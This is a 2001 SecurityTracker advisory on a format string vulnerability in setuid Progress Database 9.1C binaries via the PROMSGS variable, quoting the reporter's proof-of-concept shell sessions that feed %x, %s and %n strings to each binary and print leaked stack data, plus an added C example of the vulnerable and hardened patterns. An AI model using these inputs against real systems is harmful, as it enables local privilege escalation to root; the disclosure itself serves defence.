SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Database)  >   Progress Database
Vendors:   Progress Software Corporation
Progress Database Format String Vulnerability Yields Root Privileges to Local Users
SecurityTracker Alert ID:  1002688
SecurityTracker URL:  http://securitytracker.com/id/1002688
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 2 2001
Impact:   Execution of arbitrary code via local system, Root access via local system

Version(s): Version 9.1C; possibly others
Description:   A format string vulnerability has been reported in Progress Database. A local user can execute arbitrary shell commands with root-level privileges.

The vulnerability is reportedly in the processing of the PROMSGS environment variable, which names the message file the Progress binaries read. A local user can point this variable at a file containing a specially crafted format string to potentially cause arbitrary shell commands to be executed with root-level privileges.

It is reported that all set-user-id (suid) programs in the dlc/bin directory are vulnerable, including _dbutil, _mprosrv, _mprshut, _proapsv, _progres, _proutil, _rfutil, _probuild, and prolib.
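As an added illustration (editor's example, not Progress's code and not the reporter's), the flaw class described above in miniature: the vulnerable pattern, the hardened form, and a check a message-file loader could apply before trusting a line. Function names and the sample line are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (reconstruction, not Progress code): text read from the
 * file named by PROMSGS is handed to a printf-family function as the *format*,
 * so "%x" and "%n" in that file drive the parser inside a setuid-root process.
 * Modern compilers flag this (-Wformat-security); the pragma silences it only
 * so the demonstration compiles. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
void format_message_vulnerable(char *out, size_t outsz, const char *msgtext)
{
    snprintf(out, outsz, msgtext);      /* untrusted data used as the format */
}
#pragma GCC diagnostic pop

/* Hardened form: the format is a literal and the message text is an argument,
 * so '%' sequences in the file are copied verbatim, never interpreted. */
void format_message_safe(char *out, size_t outsz, const char *msgtext)
{
    snprintf(out, outsz, "%s", msgtext);
}

/* Defensive check for a message-file loader: count conversion directives in a
 * line. "%%" is a literal percent sign and is not counted. A loader that
 * expects plain text can reject any line with a non-zero count. */
int count_format_directives(const char *msgtext)
{
    int n = 0;
    for (const char *p = msgtext; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {              /* escaped percent: skip both chars */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Constructed sample line standing in for a hostile PROMSGS file. */
static const char CONSTRUCTED_LINE[] = "Unable to open %s: %x%x%n";

int main(void)
{
    char out[128];
    format_message_safe(out, sizeof out, CONSTRUCTED_LINE);
    printf("safe: %s (directives: %d)\n", out,
           count_format_directives(CONSTRUCTED_LINE));
    return 0;
}
```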

Impact:   A local user may be able to execute arbitrary shell commands with root-level privileges, giving the user root-level access on the host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.progress.com/v9/datasheets/rdbms.htm
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   None.


Source Message Contents

Subject:  Progress Database PROMSGS Format strings issue.


Well once again I have found yet another Progress database issue.
The PROMSGS has been looked at one time already for buffer overflows.
It was supposed to be fixed. I was poking around at it today and noticed
these format string issues...
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001      

First test with a malformed PROMSGS. 

[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Test to make sure they fixed my original hole with the buffer overflows.
(looks fine)

[elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Well, if you use a format string instead of an A, we get much better
results.

[elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10
000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec0
0xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912


[elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow msg)

[elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

I am sure you get the idea... 

ALL suids in the dlc/bin dir are affected 
[elguapo@linux bin]$ ./_dbutil
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x80543750x00x81222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304040x400
12b4b0xbffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c0x00x804daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740x532f0x00x00xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa3130300x80
00ff000x80b00d0c0x3900ffb00x2043312e0x202020200x20202020%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_mprosrv
14:03:13 Error formatting messaage 96.  Message file is corrupt.
14:03:13
0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250x00x813e8c00x813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x40022c1
40x80x400c816c0x10x00x400229240xc0b8fae0x400227b8%
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940
[elguapo@linux bin]$ ./_mprshut
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x80587650x00x819b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x00x00x0
0x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./_proapsv
14:03:33 02 Nov 2001
  Error formatting messaage 96.  Message file is corrupt.
14:03:33 02 Nov 2001
0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c900x70x00x180%
[elguapo@linux bin]$ ./_progres
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x80631850x00x842d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5f2c0x10
000x401e44a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x842d120
0xbffff5540x842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff57d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_proutil
\Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80580e50x00x81d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560x40012b
4b0xbffff6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x81d7720
0xbffff5300x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff559%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_rfutil
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x80571c50x00x81433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560x40012b
4b0xbffff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80xbffff67c%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./prolib
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x782578250x782578250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x806c4480x806e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%errno=0
reading promsgs file, it may have been deleted.
Unable to format message number 1943

-KF
Copyright 2020, SecurityGlobal.net LLC